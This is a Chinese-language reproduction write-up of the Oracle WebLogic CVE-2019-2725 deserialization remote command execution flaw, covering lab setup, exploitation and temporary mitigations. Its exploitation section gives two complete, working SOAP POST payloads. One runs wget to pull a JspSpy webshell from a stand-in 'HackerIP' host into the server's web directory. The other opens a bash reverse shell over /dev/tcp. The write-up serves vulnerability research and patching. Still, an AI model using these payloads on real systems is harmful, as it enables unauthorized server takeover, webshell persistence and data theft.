Weblogic wls9_async_response 反序列化远程命令执行漏洞（CVE-2019-2725）复现

一、     漏洞简介

漏洞编号和级别

CVE编号：CVE-2019-2725，危险级别：高危，CVSS分值：9.8。

CNVD 编号：CNVD-C-2019-48814，CNVD对该漏洞的综合评级为“高危”。

漏洞概述

2019年4月17日，国家信息安全漏洞共享平台（CNVD）收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远程命令执行漏洞（CNVD-C-2019-48814）。WebLogic是美国Oracle公司出品的Java应用服务器，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用。攻击者可利用该漏洞在未授权的情况下远程执行命令。

WebLogic Server是美国甲骨文（Oracle）公司开发的一款适用于云环境和传统环境的应用服务中间件，它提供了一个现代轻型开发平台，支持应用从开发到生产的整个生命周期管理，并简化了应用的部署和管理。

wls9-async组件为WebLogic Server提供异步通讯服务，默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷，攻击者通过发送精心构造的恶意 HTTP 请求，即可获得目标服务器的权限，在未授权的情况下远程执行命令。

影响范围

WebLogic 10.X

WebLogic 12.1.3

二、     漏洞复现

环境介绍

服务端：Oracle weblogic 10.3.6.0（CentOS）

黑客服务器：Apache Tomcat 8.5.39

攻击端：windows系统

漏洞环境搭建

Apache Tomcat安装（黑客服务器存放webshell）

1、下载地址：（https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.39/）

2、直接解压缩至你要安装的目录

3、安装成功后，运行startup.bat启动服务

4、访问http://HackerIP:8080，如下图启动成功。

5、模拟黑客在apache server上放置好大马，这里命名为JspSpy.jsp.txt，保证服务器可以正常访问

Oracle weblogic 10.3.6.0安装

Weblogic 的搭建这里就不太多说了，网上一搜一大把，按教程来就行，安装完成之后验证漏洞存在

测试漏洞地址http:// ip: port/_async/AsyncResponseService，这里端口是18001

也可以用namp插件进行扫描

确认漏洞环境搭建成功。

漏洞利用

服务器为linux服务器可以利用curl下载文件，

上传webshell可以利用如下方式

 <string>wget http://HackerIP:Port/JspSpy.jsp.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/2.jsp</string>

Poc如下：

 POST /_async/AsyncResponseService HTTP/1.1
 Host: IP:PORT
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
 Connection: close
 Content-Length: 859
 Accept-Encoding: gzip, deflate
 SOAPAction:
 Accept: */*
 User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
 Connection: keep-alive
 content-type: text/xml

 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
 xmlns:asy="http://www.bea.com/async/AsyncResponseService">
 <soapenv:Header>
 <wsa:Action>xx</wsa:Action>
 <wsa:RelatesTo>xx</wsa:RelatesTo>
 <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
 <void class="java.lang.ProcessBuilder">
 <array class="java.lang.String" length="3">
 <void index="0">
 <string>/bin/bash</string>
 </void>
 <void index="1">
 <string>-c</string>
 </void>
 <void index="2">
 <string>wget http://HackerIP:8080/JspSpy.jsp.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/2.jsp</string>
 </void>
 </array>
 <void method="start"/></void>
 </work:WorkContext>
 </soapenv:Header>
 <soapenv:Body>
 <asy:onAsyncDelivery/>
 </soapenv:Body></soapenv:Envelope>

利用burpsuit工具向模拟受害者服务器发送post请求，内容是构造好的poc代码。如果服务器存在漏洞，则会执行代码，访问黑客服务器去下载webshell。

可以看到 服务器回了一个 202 ，这个时候命令应该是执行成功了

在模拟的黑客服务器上，我们查看apache的日志，发现受害者服务器已经执行了代码，下载了预置好的webshell。

访问目标靶机webshell页面（http://ip:port/_async/2.jsp），成功访问

漏洞复现成功。

本次复现在是windows系统主机实现，如果有一台linux机器和靶机互通，可以通过反弹shell的方式直接获取靶机服务权限

Poc如下：

 POST /_async/AsyncResponseService HTTP/1.1
 Host: IP:PORT
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
 Connection: close
 Content-Length: 859
 Accept-Encoding: gzip, deflate
 SOAPAction:
 Accept: */*
 User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
 Connection: keep-alive
 content-type: text/xml

 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
 xmlns:asy="http://www.bea.com/async/AsyncResponseService">
 <soapenv:Header>
 <wsa:Action>xx</wsa:Action>
 <wsa:RelatesTo>xx</wsa:RelatesTo>
 <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
 <void class="java.lang.ProcessBuilder">
 <array class="java.lang.String" length="3">
 <void index="0">
 <string>/bin/bash</string>
 </void>
 <void index="1">
 <string>-c</string>
 </void>
 <void index="2">
 <string>bash -i &gt;&amp; /dev/tcp/HackeIP/Port 0&gt;&amp;1</string>
 </void>
 </array>
 <void method="start"/></void>
 </work:WorkContext>
 </soapenv:Header>
 <soapenv:Body>
 <asy:onAsyncDelivery/>
 </soapenv:Body></soapenv:Envelope>

三、     解决方案

临时解决方法

说明：因此次漏洞细节未披露，且目前官方没有任何文档说明此漏洞，在不确定真实影响范围的前提下，临时解决方案针对是weblogic 9、11g、12c三个版本。

1.删除该war包并重启WebLogic服务，具体文件路径如下：

Weblogic9版本：

/%WLS_HOME%/weblogic92/server/lib/bea_wls9_async_response.war

Weblogic 10版本：

/%WLS_HOME%/wlserver_10.3/server/lib/bea_wls9_async_response.war

Weblogic12版本：

/%WLS_HOME%/oracle_common/modules/com.oracle.webservices.wls.bea-wls9-async-response_12.1.3.war

注：wls9_async_response.war属于一级应用包，对其进行移除或更名操作可能造成未知的后果，Oracle官方不建议对其进行此类操作。

2.禁用bea_wls9_async_response组件：

用户可通过在weblogic启动参数中禁用bea_wls9_async_response的方式，对此漏洞形成临时防护。

在禁用不安全组件前，需请开发人员确认应用系统是否使用了weblogic提供的异步WebService功能，排查方法请附录章节。如果确认没有使用，可以使用如下方式禁用此功能：

a）以windows系统为例，在启动文件（%DOMAIN_HOME%\bin\startWeblogic.cmd）中加如下参数：

set JAVA_OPTIONS=%JAVA_OPTIONS% -Dweblogic.wsee.skip.async.response=true

set JAVA_OPTIONS=%JAVA_OPTIONS% -Dweblogic.wsee.wstx.wsat.deployed=false

c）测试结果没有问题后，重启Weblogic服务，使参数生效。b)  对应用程序进行严格测试。

四、     参考链接

https://mp.weixin.qq.com/s/Qr1tlEk5PUsjEiLO8-5v1A

https://mp.weixin.qq.com/s/Hdvp1_lUgfynQg_KP-t9Tg

https://www.venustech.com.cn/article/1/8806.html

http://www.cnvd.org.cn/webinfo/show/4989

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2725